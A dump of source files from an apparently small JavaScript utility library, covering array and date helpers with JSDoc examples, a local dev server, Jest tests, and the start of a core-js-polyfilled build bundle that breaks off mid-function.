* @example
* U.uniqueItemsBy([
* { id: 0, value: 'a' },
* { id: 1, value: 'b' },
* { id: 2, value: 'c' },
* { id: 0, value: 'd' }
* ],
* (a, b) => a.id == b.id)
* // => [{ id: 0, value: 'a' }, { id: 1, value: 'b' }, { id: 2, value: 'c' }]
*
* U.uniqueItemsBy([
* { id: 0, value: 'a' },
* { id: 1, value: 'b' },
* { id: 2, value: 'c' },
* { id: 0, value: 'd' }
* ],
* (a, b) => a.id == b.id,
* true)
* // => [{ id: 0, value: 'd' }, { id: 2, value: 'c' }, { id: 1, value: 'b' }]
*/
export const uniqueItemsBy = (arr, fn, isRight) => arr[isRight ? 'reduceRight' : 'reduce']((acc, x) => {
if (!acc.some(y => fn(x, y))) acc.push(x)
return acc
}, [])
/**
 * Finds the elements that occur more than once in an array, returning them in a new array.
* @function repeatItems
 * @param {array} arr - The array
* @return {array}
* @example
* U.repeatItems([1, 1, 2, 3, 3, 4, 5])
* // => [1, 3]
*/
export const repeatItems = arr => arr.filter(
(item, i) => (
arr.indexOf(item) === i && arr.indexOf(item) !== arr.lastIndexOf(item)
)
)
/**
 * Initializes an array of a given length and value. When the mapping is a function, it receives the iteration index i and the array length len as arguments.
* @function initArray
 * @param {number} len - The length of the array
 * @param {*|function} [val|fn=null] - Optional. The value (or mapping function) used to fill the array, defaults to null; when a function is given, its parameters are listed below:
 * @param {number} fn.index - Optional. The index of the current element being processed
 * @param {number} fn.length - Optional. The length of the array
* @return {array}
* @example
* console.log(U.initArray(3))
* // => [null, null, null]
*
* const arr = U.initArray(3, {a: 1, b: 2})
* // => [ { a: 1, b: 2 }, { a: 1, b: 2 }, { a: 1, b: 2 } ]
*
* const arr = U.initArray(3, (i) => i * 2)
* // => [ 0, 2, 4 ]
*/
export const initArray = (len, val = null) => (
isFunction(val) ? Array.from({length: len}, (item, i) => val(i, len)) : Array.from({length: len}).fill(val)
)
/**
 * Maps the values of an array to an object using a function, where each key-value pair uses the original array value as the key and the mapped value as the value.
* @function mapObject
 * @param {array} arr - The array providing the object keys
 * @param {function(currentValue, index, array)} fn - The mapping function that produces the object values
 * @param {*} fn.currentValue - The current element being processed in the array
 * @param {number} fn.index - Optional. The index of the current element being processed
 * @param {array} fn.array - Optional. The array being processed
* @return {object}
* @example
* const obj = U.mapObject([1, 2, 3], i => i * 2)
* // => {1: 2, 2: 4, 3: 6}
*/
export const mapObject = (arr, fn) => {
arr = [arr, arr.map(fn)]
return arr[0].reduce((acc, val, i) => {
acc[val] = arr[1][i]
return acc
}, {})
}
/**
 * Computes the average of a specific key, or of a key mapping, over the elements of an array
* @function averageBy
 * @param {array} arr - The array to evaluate
 * @param {function|string} fn - A mapping function over the values, or a key name
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
* U.averageBy(arr, 'a')
* // => 1.5
*
* U.averageBy(arr, o => o.a * o.b)
* // => 5
*/
export const averageBy = (arr, fn) => (
arr.map(isFunction(fn) ? fn : val => val[fn]).reduce((acc, v) => acc + v, 0) / arr.length
)
/**
 * Computes the maximum of a specific key, or of a key mapping, over the elements of an array
* @function maxBy
 * @param {array} arr - The array to evaluate
 * @param {function|string} fn - A mapping function over the values, or a key name
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
 * U.maxBy(arr, 'a')
* // => 2
*
* U.maxBy(arr, o => o.a * o.b)
* // => 8
*/
export const maxBy = (arr, fn) => Math.max(...arr.map(isFunction(fn) ? fn : v => v[fn]))
/**
 * Computes the minimum of a specific key, or of a key mapping, over the elements of an array
* @function minBy
 * @param {array} arr - The array to evaluate
 * @param {function|string} fn - A mapping function over the values, or a key name
* @return {number}
* @example
* const arr = [{a: 1, b: 2}, {a: 2, b: 4}]
*
* U.minBy(arr, 'a')
* // => 1
*
* U.minBy(arr, o => o.a * o.b)
* // => 2
*/
export const minBy = (arr, fn) => Math.min(...arr.map(isFunction(fn) ? fn : v => v[fn]))
/**
 * Splits an array into chunks of a given size
* @function chunk
 * @param {array} arr - The array to split
 * @param {number} size - The length of each chunk
* @return {array}
* @example
* chunk([1, 2, 3, 4, 5], 2)
 * // => [[1,2],[3,4],[5]]
*/
export const chunk = (arr, size) => (
Array.from({ length: Math.ceil(arr.length / size) }, (v, i) =>
arr.slice(i * size, i * size + size)
)
)
<|start_filename|>server.js<|end_filename|>
const connect = require('connect')
const serveStatic = require('serve-static')
const cp = require('child_process')
const app = connect()
app.use(serveStatic(__dirname + '/docs')) // module that can open the browser automatically
// listen
const server = app.listen(3000)
server.on('listening', function () {
server.close()
app.listen(3000)
console.log('Server running at http://127.0.0.1:3000/')
cp.exec('start http://127.0.0.1:3000/')
})
<|start_filename|>src/usually.js<|end_filename|>
import { version } from '../package.json'
import * as usually from './index'
export default {
version,
...usually
}
<|start_filename|>test/number.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('isInt', () => {
expect(U.isInt(0)).toBeTruthy()
expect(U.isInt(1.15)).toBeFalsy()
expect(U.isInt('3')).toBeFalsy()
})
test('toThousands', () => {
expect(U.toThousands(-1545454)).toBe('-1,545,454')
expect(U.toThousands(1545454.1545)).toBe('1,545,454.1545')
expect(U.toThousands('1545454.1545', '-')).toBe('1-545-454.1545')
expect(U.toThousands(0)).toBe('0')
expect(U.toThousands(null)).toBe('0')
expect(U.toThousands(undefined)).toBe(NaN)
})
test('inRange', () => {
expect(U.inRange(5, 4)).toBeFalsy()
expect(U.inRange(5, 7)).toBeTruthy()
expect(U.inRange(5, 4, 7)).toBeTruthy()
expect(U.inRange(5, 7, 10)).toBeFalsy()
expect(U.inRange(5, 10, 7)).toBeFalsy()
})
test('round', () => {
expect(U.round(1.2006, 3)).toBe(1.201)
expect(U.round(1.2006)).toBe(1)
})
test('random', () => {
let a = U.random()
expect(a > 0 && a < 1).toBeTruthy()
a = U.random(3)
expect(a > 0 && a < 3).toBeTruthy()
a = U.random(undefined, 3)
expect(a > 0 && a < 3).toBeTruthy()
a = U.random(3, 5)
expect(a > 3 && a < 5).toBeTruthy()
a = U.random(5, 3)
expect(a > 3 && a < 5).toBeTruthy()
a = U.random(-1)
expect(a > -1 && a < 0).toBeTruthy()
a = U.random(-5, -3)
expect(a > -5 && a < -3).toBeTruthy()
})
test('keepFixed', () => {
let a = U.keepFixed(-15.12, 4) === '-15.1200'
expect(a).toBeTruthy()
a = U.keepFixed(-15.12, 4, false) === '-15.12'
expect(a).toBeTruthy()
a = U.keepFixed(15, 4) === '15.0000'
expect(a).toBeTruthy()
a = U.keepFixed(15, 4, false) === '15'
expect(a).toBeTruthy()
a = U.keepFixed(15.1234564, 4, false) === '15.1234'
expect(a).toBeTruthy()
})
test('average', () => {
let n = U.average(10, 20)
expect(n).toBe(15)
n = U.average(-10, -20, 30, 40)
expect(n).toBe(10)
})
<|start_filename|>src/date.js<|end_filename|>
/** @module Date */
/**
 * Formats a date. If the value cannot be converted to a Date object by new Date(), an empty string is returned.
* @function dateFormat
 * @param {date} [date=new Date()] - Optional. The date to format, defaults to the current time.
 * @param {string} [format='YYYY-MM-DD'] - Optional. The output format, defaults to the `YYYY-MM-DD` format.
* @return {string}
* @example
* U.dateFormat(new Date(2018, 11, 10))
* // => '2018-12-10'
*
* U.dateFormat(new Date(2018, 11, 10, 10, 29, 36), 'YYYY-MM-DD hh:mm:ss')
* // => '2018-12-10 10:29:36'
*
* U.dateFormat(1545484848484, 'YYYY-MM-DD hh:mm:ss')
* // => '2018-12-22 21:20:48'
*/
export const dateFormat = (date = new Date(), format = 'YYYY-MM-DD') => {
const d = new Date(date)
const zeroize = val => val < 10 ? `0${val}` : `${val}`
return format.replace(
/YYYY|MM|DD|hh|mm|ss/g,
word => ({
'YYYY': d.getFullYear(),
'MM': zeroize(d.getMonth() + 1),
'DD': zeroize(d.getDate()),
'hh': zeroize(d.getHours()),
'mm': zeroize(d.getMinutes()),
'ss': zeroize(d.getSeconds())
}[word] || word)
)
}
/**
 * Gets the total number of days in a month; date can be any value that new Date() can convert to a Date object.
* @function getMonthDays
 * @param {date} [date=new Date()] - Optional. The date, defaults to the current time.
* @return {number}
* @example
* U.getMonthDays(new Date(2018, 1))
* // => 28
*
* U.getMonthDays(153454878787)
* // => 30
*/
export const getMonthDays = (date = new Date()) => {
const d = new Date(date)
d.setMonth(d.getMonth() + 1)
d.setDate(0)
return d.getDate()
}
/**
 * Gets the name of the weekday; lang selects the output language. date is the date and can be any value that new Date() can convert to a Date object.
* @function getWeekday
 * @param {string} [lang='zh'] - Optional. Output language, defaults to 'zh' (also used when the value is undefined); 'zh' means Chinese, 'en' means English.
 * @param {date} [date=new Date()] - Optional. The date, defaults to the current date.
* @return {string}
* @example
* U.getWeekday('zh', new Date(2018, 1, 1))
* // => '星期四'
*
 * U.getWeekday('zh', '2018/2/1')
* // => '星期四'
*
* U.getWeekday('en', 153454878787)
* // => 'Tuesday'
*/
export const getWeekday = (lang = 'zh', date = new Date()) => {
const day = new Date(date).getDay()
return lang === 'en'
? ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday'][day]
: '星期' + '日一二三四五六'.charAt(day)
}
/**
 * Gets the date one month before the given date
* @function prevMonth
 * @param {*} [date=new Date()] - Optional. The date, defaults to the current time.
* @return {date}
* @example
* U.prevMonth()
 * // => 2018-11-20T17:07:37.937Z (when the current time is 2018-12)
*
* U.prevMonth(new Date(2018, 10, 9))
* // => 2018-10-08T16:00:00.000Z
*
* U.prevMonth(153454878787)
* // => 1974-10-12T02:21:18.787Z
*
* U.prevMonth('2018/12/3')
* // => 2018-11-02T16:00:00.000Z
*/
export const prevMonth = (date = new Date()) => {
let d = new Date(date)
d.setMonth(d.getMonth() - 1)
return d
}
/**
 * Gets the date one month after the given date
* @function nextMonth
 * @param {date} [date=new Date()] - Optional. The date, defaults to the current time.
* @return {date}
* @example
* U.nextMonth()
 * // => 2019-01-20T17:13:15.179Z (when the current time is 2018-12)
*
* U.nextMonth(new Date(2018, 10, 9))
 * // => 2018-12-08T16:00:00.000Z
*
* U.nextMonth(153454878787)
* // => 1974-12-12T02:21:18.787Z
*
* U.nextMonth('2018/12/3')
 * // => 2019-01-02T16:00:00.000Z
*/
export const nextMonth = (date = new Date()) => {
let d = new Date(date)
d.setMonth(d.getMonth() + 1)
return d
}
/**
 * Checks whether dateA is a date after dateB; returns a boolean
* @function isAfterDate
 * @param {date} dateA - The later date.
 * @param {date} dateB - The earlier date.
* @return {boolean}
* @example
* U.isAfterDate('2018/11/1', '2018/11/30')
* // => false
*
* U.isAfterDate(new Date(2018, 12, 11), new Date(2018, 12, 10))
* // => true
*/
export const isAfterDate = (dateA, dateB) => new Date(dateA) > new Date(dateB)
/**
 * Returns the date that is n days away from date
* @function spreadDate
 * @param {number} n - Number of days. When n is negative, a past date is returned; when n is positive, a future date is returned.
 * @param {date} [date=new Date()] - Optional. The date, defaults to the current date.
* @return {date}
* @example
* U.spreadDate(1)
 * // => Thu Feb 21 2019 21:01:53 GMT+0800 (current time: Wed Feb 20 2019 21:01:53 GMT+0800)
*
 * U.spreadDate(-1)
 * // => Tue Feb 19 2019 21:01:53 GMT+0800 (current time: Wed Feb 20 2019 21:01:53 GMT+0800)
*
* U.spreadDate(7, new Date(2018, 9, 10))
 * // => Wed Oct 17 2018 00:00:00 GMT+0800 (China Standard Time)
*/
export const spreadDate = (n, date = new Date()) => new Date(+date + n * 24 * 60 * 60 * 1000)
<|start_filename|>test/date.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('dateFormat', () => {
let d = U.dateFormat(new Date(2018, 11, 10))
expect(d).toBe('2018-12-10')
d = U.dateFormat() === U.dateFormat(new Date())
expect(d).toBeTruthy()
d = U.dateFormat(new Date(2018, 11, 10, 10, 29, 36), 'YYYY-MM-DD hh:mm:ss')
expect(d).toBe('2018-12-10 10:29:36')
d = U.dateFormat(1545484848484, 'YYYY-MM-DD hh:mm:ss')
expect(d).toBe('2018-12-22 21:20:48')
})
test('getMonthDays', () => {
let d = U.getMonthDays(new Date(2018, 1))
expect(d).toBe(28)
d = U.getMonthDays()
expect(d).toBe(U.getMonthDays(new Date()))
d = U.getMonthDays('2018/2/1')
expect(d).toBe(28)
d = U.getMonthDays(153454878787)
expect(d).toBe(30)
})
test('getWeekday', () => {
let d = U.getWeekday(undefined, new Date(2018, 1, 1))
expect(d).toBe('星期四')
d = U.getWeekday('zh', new Date(2018, 1, 1))
expect(d).toBe('星期四')
d = U.getWeekday()
expect(d).toBe(U.getWeekday(undefined, new Date()))
d = U.getWeekday('en', new Date(2018, 1, 1))
expect(d).toBe('Thursday')
d = U.getWeekday('zh', '2018/2/1')
expect(d).toBe('星期四')
d = U.getWeekday('en', 153454878787)
expect(d).toBe('Tuesday')
})
test('prevMonth', () => {
expect(U.prevMonth).toBeInstanceOf(Function)
let d = U.prevMonth(new Date(2018, 10, 9)).toISOString()
expect(d).toBe('2018-10-08T16:00:00.000Z')
d = U.prevMonth(153454878787).toISOString()
expect(d).toBe('1974-10-12T02:21:18.787Z')
d = U.prevMonth('2018/12/3').toISOString()
expect(d).toBe('2018-11-02T16:00:00.000Z')
})
test('nextMonth', () => {
let d = U.nextMonth(new Date(2018, 10, 9)).toISOString()
expect(d).toBe('2018-12-08T16:00:00.000Z')
d = U.nextMonth(153454878787).toISOString()
expect(d).toBe('1974-12-12T02:21:18.787Z')
d = U.nextMonth('2018/12/3').toISOString()
expect(d).toBe('2019-01-02T16:00:00.000Z')
})
test('isAfterDate', () => {
expect(U.isAfterDate).toBeInstanceOf(Function)
let d = U.isAfterDate('2018/11/1', '2018/11/30')
expect(d).toBeFalsy()
d = U.isAfterDate(new Date(2018, 12, 11), new Date(2018, 12, 10))
expect(d).toBeTruthy()
})
test('spreadDate', () => {
let d = U.spreadDate(7, new Date(2018, 9, 10)).toISOString()
expect(d).toBe('2018-10-16T16:00:00.000Z')
d = U.spreadDate(1).getTime() - U.spreadDate(-1).getTime() === 172800000
expect(d).toBeTruthy()
})
<|start_filename|>test/type.test.js<|end_filename|>
'use strict'
import * as U from '../src'
test('getType', () => {
let type = U.getType(new Set([1, 2]))
expect(type).toBe('set')
type = U.getType(undefined)
expect(type).toBe('undefined')
type = U.getType(null)
expect(type).toBe('null')
})
test('isNumber', () => {
const n1 = U.isNumber(3)
expect(n1).toBeTruthy()
const n2 = U.isNumber(Number.MIN_VALUE)
expect(n2).toBeTruthy()
const n3 = U.isNumber(Infinity)
expect(n3).toBeTruthy()
const n4 = U.isNumber('3')
expect(n4).toBeFalsy()
})
test('isString', () => {
expect(U.isString('3')).toBeTruthy()
expect(U.isString(3)).toBeFalsy()
})
test('isNull', () => {
expect(U.isNull(null)).toBeTruthy()
expect(U.isNull(3)).toBeFalsy()
})
test('isUndefined', () => {
expect(U.isUndefined(undefined)).toBeTruthy()
expect(U.isUndefined(null)).toBeFalsy()
})
test('isBoolean', () => {
expect(U.isBoolean(false)).toBeTruthy()
expect(U.isBoolean(null)).toBeFalsy()
})
test('isSymbol', () => {
expect(U.isSymbol(Symbol('x'))).toBeTruthy()
expect(U.isSymbol('x')).toBeFalsy()
})
test('isFunction', () => {
expect(U.isFunction(function () {})).toBeTruthy()
expect(U.isFunction(3)).toBeFalsy()
})
test('isArray', () => {
expect(U.isArray([])).toBeTruthy()
expect(U.isArray({})).toBeFalsy()
expect(U.isArray(null)).toBeFalsy()
})
test('isObject', () => {
expect(U.isObject({})).toBeTruthy()
expect(U.isObject([1, 2])).toBeFalsy()
expect(U.isObject(null)).toBeFalsy()
})
<|start_filename|>dist/usually.js<|end_filename|>
(function (global, factory) {
typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :
typeof define === 'function' && define.amd ? define(factory) :
(global.U = factory());
}(this, (function () { 'use strict';
function createCommonjsModule(fn, module) {
return module = { exports: {} }, fn(module, module.exports), module.exports;
}
var _global = createCommonjsModule(function (module) {
// https://github.com/zloirock/core-js/issues/86#issuecomment-115759028
var global = module.exports = typeof window != 'undefined' && window.Math == Math ? window : typeof self != 'undefined' && self.Math == Math ? self // eslint-disable-next-line no-new-func
: Function('return this')();
if (typeof __g == 'number') __g = global; // eslint-disable-line no-undef
});
var _core = createCommonjsModule(function (module) {
var core = module.exports = {
version: '2.6.9'
};
if (typeof __e == 'number') __e = core; // eslint-disable-line no-undef
});
var _core_1 = _core.version;
var _aFunction = function (it) {
if (typeof it != 'function') throw TypeError(it + ' is not a function!');
return it;
};
var _ctx = function (fn, that, length) {
_aFunction(fn);
if (that === undefined) return fn;
switch (length) {
case 1:
return function (a) {
return fn.call(that, a);
};
case 2:
return function (a, b) {
return fn.call(that, a, b);
};
case 3:
return function (a, b, c) {
return fn.call(that, a, b, c);
};
}
return function ()
/* ...args */
{
return fn.apply(that, arguments);
};
};
var _isObject = function (it) {
return typeof it === 'object' ? it !== null : typeof it === 'function';
};
var _anObject = function (it) {
if (!_isObject(it)) throw TypeError(it + ' is not an object!');
return it;
};
var _fails = function (exec) {
try {
return !!exec();
} catch (e) {
return true;
}
};
var _descriptors = !_fails(function () {
return Object.defineProperty({}, 'a', {
get: function () {
return 7;
}
}).a != 7;
});
var document = _global.document; // typeof document.createElement is 'object' in old IE
var is = _isObject(document) && _isObject(document.createElement);
var _domCreate = function (it) {
return is ? document.createElement(it) : {};
};
var _ie8DomDefine = !_descriptors && !_fails(function () {
return Object.defineProperty(_domCreate('div'), 'a', {
get: function () {
return 7;
}
}).a != 7;
});
// instead of the ES6 spec version, we didn't implement @@toPrimitive case
// and the second argument - flag - preferred type is a string
var _toPrimitive = function (it, S) {
if (!_isObject(it)) return it;
var fn, val;
if (S && typeof (fn = it.toString) == 'function' && !_isObject(val = fn.call(it))) return val;
if (typeof (fn = it.valueOf) == 'function' && !_isObject(val = fn.call(it))) return val;
if (!S && typeof (fn = it.toString) == 'function' && !_isObject(val = fn.call(it))) return val;
throw TypeError("Can't convert object to primitive value");
};
var dP = Object.defineProperty;
var f = _descriptors ? Object.defineProperty : function defineProperty(O, P, Attributes) {
_anObject(O);
P = _toPrimitive(P, true);
_anObject(Attributes);
if (_ie8DomDefine) try {
return dP(O, P, Attributes);
} catch (e) {
/* empty */
}
if ('get' in Attributes || 'set' in Attributes) throw TypeError('Accessors not supported!');
if ('value' in Attributes) O[P] = Attributes.value;
return O;
};
var _objectDp = {
f: f
};
var _propertyDesc = function (bitmap, value) {
return {
enumerable: !(bitmap & 1),
configurable: !(bitmap & 2),
writable: !(bitmap & 4),
value: value
};
};
var _hide = _descriptors ? function (object, key, value) {
return _objectDp.f(object, key, _propertyDesc(1, value));
} : function (object, key, value) {
object[key] = value;
return object;
};
var hasOwnProperty = {}.hasOwnProperty;
var _has = function (it, key) {
return hasOwnProperty.call(it, key);
};
var PROTOTYPE = 'prototype';
var $export = function (type, name, source) {
var IS_FORCED = type & $export.F;
var IS_GLOBAL = type & $export.G;
var IS_STATIC = type & $export.S;
var IS_PROTO = type & $export.P;
var IS_BIND = type & $export.B;
var IS_WRAP = type & $export.W;
var exports = IS_GLOBAL ? _core : _core[name] || (_core[name] = {});
var expProto = exports[PROTOTYPE];
var target = IS_GLOBAL ? _global : IS_STATIC ? _global[name] : (_global[name] || {})[PROTOTYPE];
var key, own, out;
if (IS_GLOBAL) source = name;
for (key in source) {
// contains in native
own = !IS_FORCED && target && target[key] !== undefined;
if (own && _has(exports, key)) continue; // export native or passed
out = own ? target[key] : source[key]; // prevent global pollution for namespaces
exports[key] = IS_GLOBAL && typeof target[key] != 'function' ? source[key] // bind timers to global for call from export context
: IS_BIND && own ? _ctx(out, _global) // wrap global constructors for prevent change them in library
: IS_WRAP && target[key] == out ? function (C) {
var F = function (a, b, c) {
if (this instanceof C) {
switch (arguments.length) {
case 0:
return new C();
case 1:
return new C(a);
case 2:
return new C(a, b);
}
return new C(a, b, c);
}
return C.apply(this, arguments);
};
F[PROTOTYPE] = C[PROTOTYPE];
return F; // make static versions for prototype methods
}(out) : IS_PROTO && typeof out == 'function' ? _ctx(Function.call, out) : out; // export proto methods to core.%CONSTRUCTOR%.methods.%NAME%
if (IS_PROTO) {
(exports.virtual || (exports.virtual = {}))[key] = out; // export proto methods to core.%CONSTRUCTOR%.prototype.%NAME%
if (type & $export.R && expProto && !expProto[key]) _hide(expProto, key, out);
}
}
}; // type bitmap
$export.F = 1; // forced
$export.G = 2; // global
$export.S = 4; // static
$export.P = 8; // proto
$export.B = 16; // bind
$export.W = 32; // wrap
$export.U = 64; // safe
$export.R = 128; // real proto method for `library`
var _export = $export;
_export(_export.S + _export.F * !_descriptors, 'Object', {
defineProperty: _objectDp.f
});
var $Object = _core.Object;
var defineProperty = function defineProperty(it, key, desc) {
return $Object.defineProperty(it, key, desc);
};
var defineProperty$1 = defineProperty;
var toString = {}.toString;
var _cof = function (it) {
return toString.call(it).slice(8, -1);
};
// eslint-disable-next-line no-prototype-builtins
var _iobject = Object('z').propertyIsEnumerable(0) ? Object : function (it) {
return _cof(it) == 'String' ? it.split('') : Object(it);
};
// 7.2.1 RequireObjectCoercible(argument)
var _defined = function (it) {
if (it == undefined) throw TypeError("Can't call method on " + it);
return it;
};
var _toIobject = function (it) {
return _iobject(_defined(it));
};
// 7.1.4 ToInteger
var ceil = Math.ceil;
var floor = Math.floor;
var _toInteger = function (it) {
return isNaN(it = +it) ? 0 : (it > 0 ? floor : ceil)(it);
};
var min = Math.min;
var _toLength = function (it) {
return it > 0 ? min(_toInteger(it), 0x1fffffffffffff) : 0; // pow(2, 53) - 1 == 9007199254740991
};
var max = Math.max;
var min$1 = Math.min;
var _toAbsoluteIndex = function (index, length) {
index = _toInteger(index);
return index < 0 ? max(index + length, 0) : min$1(index, length);
};
// true -> Array#includes
var _arrayIncludes = function (IS_INCLUDES) {
return function ($this, el, fromIndex) {
var O = _toIobject($this);
var length = _toLength(O.length);
var index = _toAbsoluteIndex(fromIndex, length);
var value; // Array#includes uses SameValueZero equality algorithm
// eslint-disable-next-line no-self-compare
if (IS_INCLUDES && el != el) while (length > index) {
value = O[index++]; // eslint-disable-next-line no-self-compare
if (value != value) return true; // Array#indexOf ignores holes, Array#includes - not
} else for (; length > index; index++) if (IS_INCLUDES || index in O) {
if (O[index] === el) return IS_INCLUDES || index || 0;
}
return !IS_INCLUDES && -1;
};
};
var _library = true;
var _shared = createCommonjsModule(function (module) {
var SHARED = '__core-js_shared__';
var store = _global[SHARED] || (_global[SHARED] = {});
(module.exports = function (key, value) {
return store[key] || (store[key] = value !== undefined ? value : {});
})('versions', []).push({
version: _core.version,
mode: _library ? 'pure' : 'global',
copyright: '© 2019 <NAME> (<EMAIL>)'
});
});
var id = 0;
var px = Math.random();
var _uid = function (key) {
return 'Symbol('.concat(key === undefined ? '' : key, ')_', (++id + px).toString(36));
};
var shared = _shared('keys');
var _sharedKey = function (key) {
return shared[key] || (shared[key] = _uid(key));
};
var arrayIndexOf = _arrayIncludes(false);
var IE_PROTO = _sharedKey('IE_PROTO');
var _objectKeysInternal = function (object, names) {
var O = _toIobject(object);
var i = 0;
var result = [];
var key;
for (key in O) if (key != IE_PROTO) _has(O, key) && result.push(key); // Don't enum bug & hidden keys
while (names.length > i) if (_has(O, key = names[i++])) {
~arrayIndexOf(result, key) || result.push(key);
}
return result;
};
// IE 8- don't enum bug keys
var _enumBugKeys = 'constructor,hasOwnProperty,isPrototypeOf,propertyIsEnumerable,toLocaleString,toString,valueOf'.split(',');
var _objectKeys = Object.keys || function keys(O) {
return _objectKeysInternal(O, _enumBugKeys);
};
var _objectDps = _descriptors ? Object.defineProperties : function defineProperties(O, Properties) {
_anObject(O);
var keys = _objectKeys(Properties);
var length = keys.length;
var i = 0;
var P;
while (length > i) _objectDp.f(O, P = keys[i++], Properties[P]);
return O;
};
_export(_export.S + _export.F * !_descriptors, 'Object', {
defineProperties: _objectDps
});
var $Object$1 = _core.Object;
var defineProperties = function defineProperties(T, D) {
return $Object$1.defineProperties(T, D);
};
var defineProperties$1 = defineProperties;
var hiddenKeys = _enumBugKeys.concat('length', 'prototype');
var f$1 = Object.getOwnPropertyNames || function getOwnPropertyNames(O) {
return _objectKeysInternal(O, hiddenKeys);
};
var _objectGopn = {
f: f$1
};
var f$2 = Object.getOwnPropertySymbols;
var _objectGops = {
f: f$2
};
var Reflect$1 = _global.Reflect;
var _ownKeys = Reflect$1 && Reflect$1.ownKeys || function ownKeys(it) {
var keys = _objectGopn.f(_anObject(it));
var getSymbols = _objectGops.f;
return getSymbols ? keys.concat(getSymbols(it)) : keys;
};
var f$3 = {}.propertyIsEnumerable;
var _objectPie = {
f: f$3
};
var gOPD = Object.getOwnPropertyDescriptor;
var f$4 = _descriptors ? gOPD : function getOwnPropertyDescriptor(O, P) {
O = _toIobject(O);
P = _toPrimitive(P, true);
if (_ie8DomDefine) try {
return gOPD(O, P);
} catch (e) {
/* empty */
}
if (_has(O, P)) return _propertyDesc(!_objectPie.f.call(O, P), O[P]);
};
var _objectGopd = {
f: f$4
};
var _createProperty = function (object, index, value) {
if (index in object) _objectDp.f(object, index, _propertyDesc(0, value));else object[index] = value;
};
_export(_export.S, 'Object', {
getOwnPropertyDescriptors: function getOwnPropertyDescriptors(object) {
var O = _toIobject(object);
var getDesc = _objectGopd.f;
var keys = _ownKeys(O);
var result = {};
var i = 0;
var key, desc;
while (keys.length > i) {
desc = getDesc(O, key = keys[i++]);
if (desc !== undefined) _createProperty(result, key, desc);
}
return result;
}
});
var getOwnPropertyDescriptors = _core.Object.getOwnPropertyDescriptors;
var getOwnPropertyDescriptors$1 = getOwnPropertyDescriptors;
var _objectSap = function (KEY, exec) {
var fn = (_core.Object || {})[KEY] || Object[KEY];
var exp = {};
exp[KEY] = exec(fn);
_export(_export.S + _export.F * _fails(function () {
fn(1);
}), 'Object', exp);
};
var $getOwnPropertyDescriptor = _objectGopd.f;
_objectSap('getOwnPropertyDescriptor', function () {
return function getOwnPropertyDescriptor(it, key) {
return $getOwnPropertyDescriptor(_toIobject(it), key);
};
});
var $Object$2 = _core.Object;
var getOwnPropertyDescriptor = function getOwnPropertyDescriptor(it, key) {
return $Object$2.getOwnPropertyDescriptor(it, key);
};
var getOwnPropertyDescriptor$1 = getOwnPropertyDescriptor;
var _redefine = _hide;
var _meta = createCommonjsModule(function (module) {
var META = _uid('meta');
var setDesc = _objectDp.f;
var id = 0;
var isExtensible = Object.isExtensible || function () {
return true;
};
var FREEZE = !_fails(function () {
return isExtensible(Object.preventExtensions({}));
});
var setMeta = function (it) {
setDesc(it, META, {
value: {
i: 'O' + ++id,
// object ID
w: {} // weak collections IDs
}
});
};
var fastKey = function (it, create) {
// return primitive with prefix
if (!_isObject(it)) return typeof it == 'symbol' ? it : (typeof it == 'string' ? 'S' : 'P') + it;
if (!_has(it, META)) {
// can't set metadata to uncaught frozen object
if (!isExtensible(it)) return 'F'; // not necessary to add metadata
if (!create) return 'E'; // add missing metadata
setMeta(it); // return object ID
}
return it[META].i;
};
var getWeak = function (it, create) {
if (!_has(it, META)) {
// can't set metadata to uncaught frozen object
if (!isExtensible(it)) return true; // not necessary to add metadata
if (!create) return false; // add missing metadata
setMeta(it); // return hash weak collections IDs
}
return it[META].w;
}; // add metadata on freeze-family methods calling
var onFreeze = function (it) {
if (FREEZE && meta.NEED && isExtensible(it) && !_has(it, META)) setMeta(it);
return it;
};
var meta = module.exports = {
KEY: META,
NEED: false,
fastKey: fastKey,
getWeak: getWeak,
onFreeze: onFreeze
};
});
var _meta_1 = _meta.KEY;
var _meta_2 = _meta.NEED;
var _meta_3 = _meta.fastKey;
var _meta_4 = _meta.getWeak;
var _meta_5 = _meta.onFreeze;
var _wks = createCommonjsModule(function (module) {
var store = _shared('wks');
var Symbol = _global.Symbol;
var USE_SYMBOL = typeof Symbol == 'function';
var $exports = module.exports = function (name) {
return store[name] || (store[name] = USE_SYMBOL && Symbol[name] || (USE_SYMBOL ? Symbol : _uid)('Symbol.' + name));
};
$exports.store = store;
});
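// _wks returns (and caches in the shared 'wks' store) well-known symbols,
// creating a fresh Symbol — or a uid-based string key when no native Symbol
// exists — for names the runtime does not provide.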
var def = _objectDp.f;
var TAG = _wks('toStringTag');
var _setToStringTag = function (it, tag, stat) {
if (it && !_has(it = stat ? it : it.prototype, TAG)) def(it, TAG, {
configurable: true,
value: tag
});
};
var f$5 = _wks;
var _wksExt = {
f: f$5
};
var defineProperty$2 = _objectDp.f;
var _wksDefine = function (name) {
var $Symbol = _core.Symbol || (_core.Symbol = _library ? {} : _global.Symbol || {});
if (name.charAt(0) != '_' && !(name in $Symbol)) defineProperty$2($Symbol, name, {
value: _wksExt.f(name)
});
};
var _enumKeys = function (it) {
var result = _objectKeys(it);
var getSymbols = _objectGops.f;
if (getSymbols) {
var symbols = getSymbols(it);
var isEnum = _objectPie.f;
var i = 0;
var key;
while (symbols.length > i) if (isEnum.call(it, key = symbols[i++])) result.push(key);
}
return result;
};
var _isArray = Array.isArray || function isArray(arg) {
return _cof(arg) == 'Array';
};
var _toObject = function (it) {
return Object(_defined(it));
};
var document$1 = _global.document;
var _html = document$1 && document$1.documentElement;
var IE_PROTO$1 = _sharedKey('IE_PROTO');
var Empty = function () {
/* empty */
};
var PROTOTYPE$1 = 'prototype'; // Create object with fake `null` prototype: use iframe Object with cleared prototype
var createDict = function () {
// Thrash, waste and sodomy: IE GC bug
var iframe = _domCreate('iframe');
var i = _enumBugKeys.length;
var lt = '<';
var gt = '>';
var iframeDocument;
iframe.style.display = 'none';
_html.appendChild(iframe);
iframe.src = 'javascript:'; // eslint-disable-line no-script-url
// createDict = iframe.contentWindow.Object;
// html.removeChild(iframe);
iframeDocument = iframe.contentWindow.document;
iframeDocument.open();
